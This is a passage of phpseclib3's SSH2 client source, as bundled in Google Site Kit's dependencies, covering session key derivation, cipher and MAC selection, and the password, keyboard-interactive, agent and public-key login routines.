'NET_SSH2_MSG_KEX_ECDH_REPLY'); break; case 'NET_SSH2_MSG_KEXDH_GEX_REPLY': $this->updateLogHistory('UNKNOWN (33)', 'NET_SSH2_MSG_KEXDH_GEX_REPLY'); } $this->server_public_host_key = $server_public_host_key; list($public_key_format) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $server_public_host_key); if (\strlen($this->signature) < 4) { throw new \LengthException('The signature needs at least four bytes'); } $temp = \unpack('Nlength', \substr($this->signature, 0, 4)); $this->signature_format = \substr($this->signature, 4, $temp['length']); $keyBytes = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::computeSecret($ourPrivate, $theirPublicBytes); if (($keyBytes & "\xff\x80") === "\x00\x00") { $keyBytes = \substr($keyBytes, 1); } elseif (($keyBytes[0] & "\x80") === "\x80") { $keyBytes = "\x00{$keyBytes}"; } $this->exchange_hash = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s5', $this->identifier, $this->server_identifier, $kexinit_payload_client, $kexinit_payload_server, $this->server_public_host_key); $this->exchange_hash .= $exchange_hash_rfc4419; $this->exchange_hash .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s3', $ourPublicBytes, $theirPublicBytes, $keyBytes); $this->exchange_hash = $kexHash->hash($this->exchange_hash); if ($this->session_id === \false) { $this->session_id = $this->exchange_hash; } switch ($server_host_key_algorithm) { case 'rsa-sha2-256': case 'rsa-sha2-512': //case 'ssh-rsa': $expected_key_format = 'ssh-rsa'; break; default: $expected_key_format = $server_host_key_algorithm; } if ($public_key_format != $expected_key_format || $this->signature_format != $server_host_key_algorithm) { switch (\true) { case $this->signature_format == $server_host_key_algorithm: case $server_host_key_algorithm != 'rsa-sha2-256' && $server_host_key_algorithm != 'rsa-sha2-512': case $this->signature_format != 'ssh-rsa': $this->disconnect_helper(NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE); throw new \RuntimeException('Server Host Key Algorithm Mismatch (' . $this->signature_format . ' vs ' . $server_host_key_algorithm . ')'); } } $packet = \pack('C', NET_SSH2_MSG_NEWKEYS); $this->send_binary_packet($packet); $this->get_binary_packet_or_close(NET_SSH2_MSG_NEWKEYS); $this->keyExchangeInProgress = \false; if ($this->strict_kex_flag) { $this->get_seq_no = $this->send_seq_no = 0; } $keyBytes = \pack('Na*', \strlen($keyBytes), $keyBytes); $this->encrypt = self::encryption_algorithm_to_crypt_instance($encrypt); if ($this->encrypt) { if (self::$crypto_engine) { $this->encrypt->setPreferredEngine(self::$crypto_engine); } if ($this->encrypt->getBlockLengthInBytes()) { $this->encrypt_block_size = $this->encrypt->getBlockLengthInBytes(); } $this->encrypt->disablePadding(); if ($this->encrypt->usesIV()) { $iv = $kexHash->hash($keyBytes . $this->exchange_hash . 'A' . $this->session_id); while ($this->encrypt_block_size > \strlen($iv)) { $iv .= $kexHash->hash($keyBytes . $this->exchange_hash . $iv); } $this->encrypt->setIV(\substr($iv, 0, $this->encrypt_block_size)); } switch ($encrypt) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $nonce = $kexHash->hash($keyBytes . $this->exchange_hash . 'A' . $this->session_id); $this->encryptFixedPart = \substr($nonce, 0, 4); $this->encryptInvocationCounter = \substr($nonce, 4, 8); // fall-through case 'chacha20-poly1305@openssh.com': break; default: $this->encrypt->enableContinuousBuffer(); } $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'C' . $this->session_id); while ($encryptKeyLength > \strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } switch ($encrypt) { case 'chacha20-poly1305@openssh.com': $encryptKeyLength = 32; $this->lengthEncrypt = self::encryption_algorithm_to_crypt_instance($encrypt); $this->lengthEncrypt->setKey(\substr($key, 32, 32)); } $this->encrypt->setKey(\substr($key, 0, $encryptKeyLength)); $this->encryptName = $encrypt; } $this->decrypt = self::encryption_algorithm_to_crypt_instance($decrypt); if ($this->decrypt) { if (self::$crypto_engine) { $this->decrypt->setPreferredEngine(self::$crypto_engine); } if ($this->decrypt->getBlockLengthInBytes()) { $this->decrypt_block_size = $this->decrypt->getBlockLengthInBytes(); } $this->decrypt->disablePadding(); if ($this->decrypt->usesIV()) { $iv = $kexHash->hash($keyBytes . $this->exchange_hash . 'B' . $this->session_id); while ($this->decrypt_block_size > \strlen($iv)) { $iv .= $kexHash->hash($keyBytes . $this->exchange_hash . $iv); } $this->decrypt->setIV(\substr($iv, 0, $this->decrypt_block_size)); } switch ($decrypt) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': // see https://tools.ietf.org/html/rfc5647#section-7.1 $nonce = $kexHash->hash($keyBytes . $this->exchange_hash . 'B' . $this->session_id); $this->decryptFixedPart = \substr($nonce, 0, 4); $this->decryptInvocationCounter = \substr($nonce, 4, 8); // fall-through case 'chacha20-poly1305@openssh.com': break; default: $this->decrypt->enableContinuousBuffer(); } $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'D' . $this->session_id); while ($decryptKeyLength > \strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } switch ($decrypt) { case 'chacha20-poly1305@openssh.com': $decryptKeyLength = 32; $this->lengthDecrypt = self::encryption_algorithm_to_crypt_instance($decrypt); $this->lengthDecrypt->setKey(\substr($key, 32, 32)); } $this->decrypt->setKey(\substr($key, 0, $decryptKeyLength)); $this->decryptName = $decrypt; } /* The "arcfour128" algorithm is the RC4 cipher, as described in [SCHNEIER], using a 128-bit key. The first 1536 bytes of keystream generated by the cipher MUST be discarded, and the first byte of the first encrypted packet MUST be encrypted using the 1537th byte of keystream. -- http://tools.ietf.org/html/rfc4345#section-4 */ if ($encrypt == 'arcfour128' || $encrypt == 'arcfour256') { $this->encrypt->encrypt(\str_repeat("\x00", 1536)); } if ($decrypt == 'arcfour128' || $decrypt == 'arcfour256') { $this->decrypt->decrypt(\str_repeat("\x00", 1536)); } if (!$this->encrypt->usesNonce()) { list($this->hmac_create, $createKeyLength) = self::mac_algorithm_to_hash_instance($mac_algorithm_out); } else { $this->hmac_create = new \stdClass(); $this->hmac_create_name = $mac_algorithm_out; //$mac_algorithm_out = 'none'; $createKeyLength = 0; } if ($this->hmac_create instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash) { $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'E' . $this->session_id); while ($createKeyLength > \strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } $this->hmac_create->setKey(\substr($key, 0, $createKeyLength)); $this->hmac_create_name = $mac_algorithm_out; $this->hmac_create_etm = \preg_match('#-etm@openssh\\.com$#', $mac_algorithm_out); } if (!$this->decrypt->usesNonce()) { list($this->hmac_check, $checkKeyLength) = self::mac_algorithm_to_hash_instance($mac_algorithm_in); $this->hmac_size = $this->hmac_check->getLengthInBytes(); } else { $this->hmac_check = new \stdClass(); $this->hmac_check_name = $mac_algorithm_in; //$mac_algorithm_in = 'none'; $checkKeyLength = 0; $this->hmac_size = 0; } if ($this->hmac_check instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash) { $key = $kexHash->hash($keyBytes . $this->exchange_hash . 'F' . $this->session_id); while ($checkKeyLength > \strlen($key)) { $key .= $kexHash->hash($keyBytes . $this->exchange_hash . $key); } $this->hmac_check->setKey(\substr($key, 0, $checkKeyLength)); $this->hmac_check_name = $mac_algorithm_in; $this->hmac_check_etm = \preg_match('#-etm@openssh\\.com$#', $mac_algorithm_in); } $this->regenerate_compression_context = $this->regenerate_decompression_context = \true; return \true; } /** * Maps an encryption algorithm name to the number of key bytes. * * @param string $algorithm Name of the encryption algorithm * @return int|null Number of bytes as an integer or null for unknown */ private function encryption_algorithm_to_key_size($algorithm) { if ($this->bad_key_size_fix && self::bad_algorithm_candidate($algorithm)) { return 16; } switch ($algorithm) { case 'none': return 0; case 'aes128-gcm@openssh.com': case 'aes128-cbc': case 'aes128-ctr': case 'arcfour': case 'arcfour128': case 'blowfish-cbc': case 'blowfish-ctr': case 'twofish128-cbc': case 'twofish128-ctr': return 16; case '3des-cbc': case '3des-ctr': case 'aes192-cbc': case 'aes192-ctr': case 'twofish192-cbc': case 'twofish192-ctr': return 24; case 'aes256-gcm@openssh.com': case 'aes256-cbc': case 'aes256-ctr': case 'arcfour256': case 'twofish-cbc': case 'twofish256-cbc': case 'twofish256-ctr': return 32; case 'chacha20-poly1305@openssh.com': return 64; } return null; } /** * Maps an encryption algorithm name to an instance of a subclass of * \phpseclib3\Crypt\Common\SymmetricKey. * * @param string $algorithm Name of the encryption algorithm * @return SymmetricKey|null */ private static function encryption_algorithm_to_crypt_instance($algorithm) { switch ($algorithm) { case '3des-cbc': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('cbc'); case '3des-ctr': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES('ctr'); case 'aes256-cbc': case 'aes192-cbc': case 'aes128-cbc': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael('cbc'); case 'aes256-ctr': case 'aes192-ctr': case 'aes128-ctr': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael('ctr'); case 'blowfish-cbc': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Blowfish('cbc'); case 'blowfish-ctr': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Blowfish('ctr'); case 'twofish128-cbc': case 'twofish192-cbc': case 'twofish256-cbc': case 'twofish-cbc': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Twofish('cbc'); case 'twofish128-ctr': case 'twofish192-ctr': case 'twofish256-ctr': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Twofish('ctr'); case 'arcfour': case 'arcfour128': case 'arcfour256': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RC4(); case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael('gcm'); case 'chacha20-poly1305@openssh.com': return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20(); } return null; } /** * Maps an encryption algorithm name to an instance of a subclass of * \phpseclib3\Crypt\Hash. * * @param string $algorithm Name of the encryption algorithm * @return array{Hash, int}|null */ private static function mac_algorithm_to_hash_instance($algorithm) { switch ($algorithm) { case 'umac-64@openssh.com': case 'umac-64-etm@openssh.com': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('umac-64'), 16]; case 'umac-128@openssh.com': case 'umac-128-etm@openssh.com': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('umac-128'), 16]; case 'hmac-sha2-512': case 'hmac-sha2-512-etm@openssh.com': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha512'), 64]; case 'hmac-sha2-256': case 'hmac-sha2-256-etm@openssh.com': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'), 32]; case 'hmac-sha1': case 'hmac-sha1-etm@openssh.com': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'), 20]; case 'hmac-sha1-96': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1-96'), 20]; case 'hmac-md5': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('md5'), 16]; case 'hmac-md5-96': return [new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('md5-96'), 16]; } } /** * Tests whether or not proposed algorithm has a potential for issues * * @link https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/ssh2-aesctr-openssh.html * @link https://bugzilla.mindrot.org/show_bug.cgi?id=1291 * @param string $algorithm Name of the encryption algorithm * @return bool */ private static function bad_algorithm_candidate($algorithm) { switch ($algorithm) { case 'arcfour256': case 'aes192-ctr': case 'aes256-ctr': return \true; } return \false; } /** * Login * * The $password parameter can be a plaintext password, a \phpseclib3\Crypt\RSA|EC|DSA object, a \phpseclib3\System\SSH\Agent object or an array * * @param string $username * @param string|PrivateKey|array[]|Agent|null ...$args * @return bool * @see self::_login() */ public function login($username, ...$args) { if (!$this->login_credentials_finalized) { $this->auth[] = \func_get_args(); } // try logging with 'none' as an authentication method first since that's what // PuTTY does if (\substr($this->server_identifier, 0, 15) != 'SSH-2.0-CoreFTP' && $this->auth_methods_to_continue === null) { if ($this->sublogin($username)) { return \true; } if (!\count($args)) { return \false; } } return $this->sublogin($username, ...$args); } /** * Login Helper * * @param string $username * @param string|PrivateKey|array[]|Agent|null ...$args * @return bool * @see self::_login_helper() */ protected function sublogin($username, ...$args) { if (!($this->bitmap & self::MASK_CONSTRUCTOR)) { $this->connect(); } if (empty($args)) { return $this->login_helper($username); } foreach ($args as $arg) { switch (\true) { case $arg instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey: throw new \UnexpectedValueException('A PublicKey object was passed to the login method instead of a PrivateKey object'); case $arg instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey: case $arg instanceof \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent: case \is_array($arg): case \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($arg): break; default: throw new \UnexpectedValueException('$password needs to either be an instance of \\phpseclib3\\Crypt\\Common\\PrivateKey, \\System\\SSH\\Agent, an array or a string'); } } while (\count($args)) { if (!$this->auth_methods_to_continue || !$this->smartMFA) { $newargs = $args; $args = []; } else { $newargs = []; foreach ($this->auth_methods_to_continue as $method) { switch ($method) { case 'publickey': foreach ($args as $key => $arg) { if ($arg instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey || $arg instanceof \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent) { $newargs[] = $arg; unset($args[$key]); break; } } break; case 'keyboard-interactive': $hasArray = $hasString = \false; foreach ($args as $arg) { if ($hasArray || \is_array($arg)) { $hasArray = \true; break; } if ($hasString || \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($arg)) { $hasString = \true; break; } } if ($hasArray && $hasString) { foreach ($args as $key => $arg) { if (\is_array($arg)) { $newargs[] = $arg; break 2; } } } // fall-through case 'password': foreach ($args as $key => $arg) { $newargs[] = $arg; unset($args[$key]); break; } } } } if (!\count($newargs)) { return \false; } foreach ($newargs as $arg) { if ($this->login_helper($username, $arg)) { $this->login_credentials_finalized = \true; return \true; } } } return \false; } /** * Login Helper * * {@internal It might be worthwhile, at some point, to protect against {@link http://tools.ietf.org/html/rfc4251#section-9.3.9 traffic analysis} * by sending dummy SSH_MSG_IGNORE messages.} * * @param string $username * @param string|AsymmetricKey|array[]|Agent|null ...$args * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ private function login_helper($username, $password = null) { if (!($this->bitmap & self::MASK_CONNECTED)) { return \false; } if (!($this->bitmap & self::MASK_LOGIN_REQ)) { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Cs', NET_SSH2_MSG_SERVICE_REQUEST, 'ssh-userauth'); $this->send_binary_packet($packet); try { $response = $this->get_binary_packet_or_close(NET_SSH2_MSG_SERVICE_ACCEPT); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\InvalidPacketLengthException $e) { // the first opportunity to encounter the "bad key size" error if (!$this->bad_key_size_fix && $this->decryptName != null && self::bad_algorithm_candidate($this->decryptName)) { // bad_key_size_fix is only ever re-assigned to true here // retry the connection with that new setting but we'll // only try it once. $this->bad_key_size_fix = \true; return $this->reconnect(); } throw $e; } list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); list($service) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); if ($service != 'ssh-userauth') { $this->disconnect_helper(NET_SSH2_DISCONNECT_PROTOCOL_ERROR); throw new \UnexpectedValueException('Expected SSH_MSG_SERVICE_ACCEPT'); } $this->bitmap |= self::MASK_LOGIN_REQ; } if (\strlen($this->last_interactive_response)) { return !\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($password) && !\is_array($password) ? \false : $this->keyboard_interactive_process($password); } if ($password instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { return $this->privatekey_login($username, $password); } if ($password instanceof \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent) { return $this->ssh_agent_login($username, $password); } if (\is_array($password)) { if ($this->keyboard_interactive_login($username, $password)) { $this->bitmap |= self::MASK_LOGIN; return \true; } return \false; } if (!isset($password)) { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Cs3', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'none'); $this->send_binary_packet($packet); $response = $this->get_binary_packet_or_close(); list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return \true; case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; // fall-through default: return \false; } } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Cs3bs', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'password', \false, $password); // remove the username and password from the logged packet if (!\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $logged = null; } else { $logged = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Cs3bs', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'password', \false, 'password'); } $this->send_binary_packet($packet, $logged); $response = $this->get_binary_packet_or_close(); list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ: // in theory, the password can be changed $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ'); list($message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); $this->errors[] = 'SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: ' . $message; return $this->disconnect_helper(NET_SSH2_DISCONNECT_AUTH_CANCELLED_BY_USER); case NET_SSH2_MSG_USERAUTH_FAILURE: // can we use keyboard-interactive authentication? if not then either the login is bad or the server employees // multi-factor authentication list($auth_methods, $partial_success) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Lb', $response); $this->auth_methods_to_continue = $auth_methods; if (!$partial_success && \in_array('keyboard-interactive', $auth_methods)) { if ($this->keyboard_interactive_login($username, $password)) { $this->bitmap |= self::MASK_LOGIN; return \true; } return \false; } return \false; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return \true; } return \false; } /** * Login via keyboard-interactive authentication * * See {@link http://tools.ietf.org/html/rfc4256 RFC4256} for details. This is not a full-featured keyboard-interactive authenticator. * * @param string $username * @param string|array $password * @return bool */ private function keyboard_interactive_login($username, $password) { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2( 'Cs5', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'keyboard-interactive', '', // language tag '' ); $this->send_binary_packet($packet); return $this->keyboard_interactive_process($password); } /** * Handle the keyboard-interactive requests / responses. * * @param string|array ...$responses * @return bool * @throws \RuntimeException on connection error */ private function keyboard_interactive_process(...$responses) { if (\strlen($this->last_interactive_response)) { $response = $this->last_interactive_response; } else { $orig = $response = $this->get_binary_packet_or_close(); } list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_INFO_REQUEST: list(, , , $num_prompts) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s3N', $response); for ($i = 0; $i < \count($responses); $i++) { if (\is_array($responses[$i])) { foreach ($responses[$i] as $key => $value) { $this->keyboard_requests_responses[$key] = $value; } unset($responses[$i]); } } $responses = \array_values($responses); if (isset($this->keyboard_requests_responses)) { for ($i = 0; $i < $num_prompts; $i++) { list($prompt, ) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('sC', $response); foreach ($this->keyboard_requests_responses as $key => $value) { if (\substr($prompt, 0, \strlen($key)) == $key) { $responses[] = $value; break; } } } } // see http://tools.ietf.org/html/rfc4256#section-3.2 if (\strlen($this->last_interactive_response)) { $this->last_interactive_response = ''; } else { $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_INFO_REQUEST'); } if (!\count($responses) && $num_prompts) { $this->last_interactive_response = $orig; return \false; } /* After obtaining the requested information from the user, the client MUST respond with an SSH_MSG_USERAUTH_INFO_RESPONSE message. */ // see http://tools.ietf.org/html/rfc4256#section-3.4 $packet = $logged = \pack('CN', NET_SSH2_MSG_USERAUTH_INFO_RESPONSE, \count($responses)); for ($i = 0; $i < \count($responses); $i++) { $packet .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $responses[$i]); $logged .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', 'dummy-answer'); } $this->send_binary_packet($packet, $logged); $this->updateLogHistory('UNKNOWN (61)', 'NET_SSH2_MSG_USERAUTH_INFO_RESPONSE'); /* After receiving the response, the server MUST send either an SSH_MSG_USERAUTH_SUCCESS, SSH_MSG_USERAUTH_FAILURE, or another SSH_MSG_USERAUTH_INFO_REQUEST message. */ // maybe phpseclib should force close the connection after x request / responses? unless something like that is done // there could be an infinite loop of request / responses. return $this->keyboard_interactive_process(); case NET_SSH2_MSG_USERAUTH_SUCCESS: return \true; case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; return \false; } return \false; } /** * Login with an ssh-agent provided key * * @param string $username * @param Agent $agent * @return bool */ private function ssh_agent_login($username, \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent $agent) { $this->agent = $agent; $keys = $agent->requestIdentities(); $orig_algorithms = $this->supported_private_key_algorithms; foreach ($keys as $key) { if ($this->privatekey_login($username, $key)) { return \true; } $this->supported_private_key_algorithms = $orig_algorithms; } return \false; } /** * Login with an RSA private key * * {@internal It might be worthwhile, at some point, to protect against {@link http://tools.ietf.org/html/rfc4251#section-9.3.9 traffic analysis} * by sending dummy SSH_MSG_IGNORE messages.} * * @param string $username * @param PrivateKey $privatekey * @return bool * @throws \RuntimeException on connection error */ private function privatekey_login($username, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey $privatekey) { $publickey = $privatekey->getPublicKey(); if ($publickey instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { $privatekey = $privatekey->withPadding(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PKCS1); $algos = ['rsa-sha2-256', 'rsa-sha2-512', 'ssh-rsa']; if (isset($this->preferred['hostkey'])) { $algos = \array_intersect($algos, $this->preferred['hostkey']); } $algo = self::array_intersect_first($algos, $this->supported_private_key_algorithms); switch ($algo) { case 'rsa-sha2-512': $hash = 'sha512'; $signatureType = 'rsa-sha2-512'; break; case 'rsa-sha2-256': $hash = 'sha256'; $signatureType = 'rsa-sha2-256'; break; //case 'ssh-rsa': default: $hash = 'sha1'; $signatureType = 'ssh-rsa'; } } elseif ($publickey instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC) { $privatekey = $privatekey->withSignatureFormat('SSH2'); $curveName = $privatekey->getCurve(); switch ($curveName) { case 'Ed25519': $hash = 'sha512'; $signatureType = 'ssh-ed25519'; break; case 'secp256r1': // nistp256 $hash = 'sha256'; $signatureType = 'ecdsa-sha2-nistp256'; break; case 'secp384r1': // nistp384 $hash = 'sha384'; $signatureType = 'ecdsa-sha2-nistp384'; break; case 'secp521r1': // nistp521 $hash = 'sha512'; $signatureType = 'ecdsa-sha2-nistp521'; break; default: if (\is_array($curveName)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Specified Curves are not supported by SSH2'); } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Named Curve of ' . $curveName . ' is not supported by phpseclib3\'s SSH2 implementation'); } } elseif ($publickey instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA) { $privatekey = $privatekey->withSignatureFormat('SSH2'); $hash = 'sha1'; $signatureType = 'ssh-dss'; } else { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Please use either an RSA key, an EC one or a DSA key'); } $publickeyStr = $publickey->toString('OpenSSH', ['binary' => \true]); $part1 = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Csss', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'publickey'); $part2 = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $signatureType, $publickeyStr); $packet = $part1 . \chr(0) . $part2; $this->send_binary_packet($packet); $response = $this->get_binary_packet_or_close(NET_SSH2_MSG_USERAUTH_SUCCESS, NET_SSH2_MSG_USERAUTH_FAILURE, NET_SSH2_MSG_USERAUTH_PK_OK); list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('L', $response); if (\in_array('publickey', $auth_methods) && \substr($signatureType, 0, 9) == 'rsa-sha2-') { $this->supported_private_key_algorithms = \array_diff($this->supported_private_key_algorithms, ['rsa-sha2-256', 'rsa-sha2-512']); return $this->privatekey_login($username, $privatekey); } $this->auth_methods_to_continue = $auth_methods; $this->errors[] = 'SSH_MSG_USERAUTH_FAILURE'; return \false; case NET_SSH2_MSG_USERAUTH_PK_OK: // we'll just take it on faith that the public key blob and the public key algorithm name are as // they should be $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_PK_OK'); break; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return \true; } $packet = $part1 . \chr(1) . $part2; $privatekey = $privatekey->withHash($hash); $signature = $privatekey->sign(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $this->session_id) . $packet); if ($publickey instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { $signature = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $signatureType, $signature); } $packet .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $signature); $this->send_binary_packet($packet); $response = $this->get_binary_packet_or_close(NET_SSH2_MSG_USERAUTH_SUCCESS, NET_SSH2_MSG_USERAUTH_FAILURE); list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_FAILURE: // either the login is bad or the server employs multi-factor authentication list($auth_methods) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; return \false; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return \true; } } /** * Return the currently configured timeout * * @return int */ public function getTimeout() { return $this->timeout; } /** * Set Timeout * * $ssh->exec('ping 127.0.0.1'); on a Linux host will never return and will run indefinitely. setTimeout() makes it so it'll timeout. * Setting $timeout to false or 0 will revert to the default socket timeout. * * @param mixed $timeout */ public function setTimeout($timeout) { $this->timeout = $this->curTimeout = $timeout; } /** * Set Keep Alive * * Sends an SSH2_MSG_IGNORE message every x seconds, if x is a positive non-zero number. * * @param int $interval */ public function setKeepAlive($interval) { $this->keepAlive = $interval; } /** * Get the output from stdError * */ public function getStdError() { return $this->stdErrorLog; } /** * Execute Command * * If $callback is set to false then \phpseclib3\Net\SSH2::get_channel_packet(self::CHANNEL_EXEC) will need to be called manually. * In all likelihood, this is not a feature you want to be taking advantage of. * * @param string $command * @param callable $callback * @return string|bool * @psalm-return ($callback is callable ? bool : string|bool) * @throws \RuntimeException on connection error */ public function exec($command, $callback = null) { $this->curTimeout = $this->timeout; $this->is_timeout = \false; $this->stdErrorLog = ''; if (!$this->isAuthenticated()) { return \false; } //if ($this->isPTYOpen()) { // throw new \RuntimeException('If you want to run multiple exec()\'s you will need to disable (and re-enable if appropriate) a PTY for each one.'); //} $this->open_channel(self::CHANNEL_EXEC); if ($this->request_pty === \true) { $terminal_modes = \pack('C', NET_SSH2_TTY_OP_END); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsCsN4s', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_EXEC], 'pty-req', 1, $this->term, $this->windowColumns, $this->windowRows, 0, 0, $terminal_modes); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_REQUEST; if 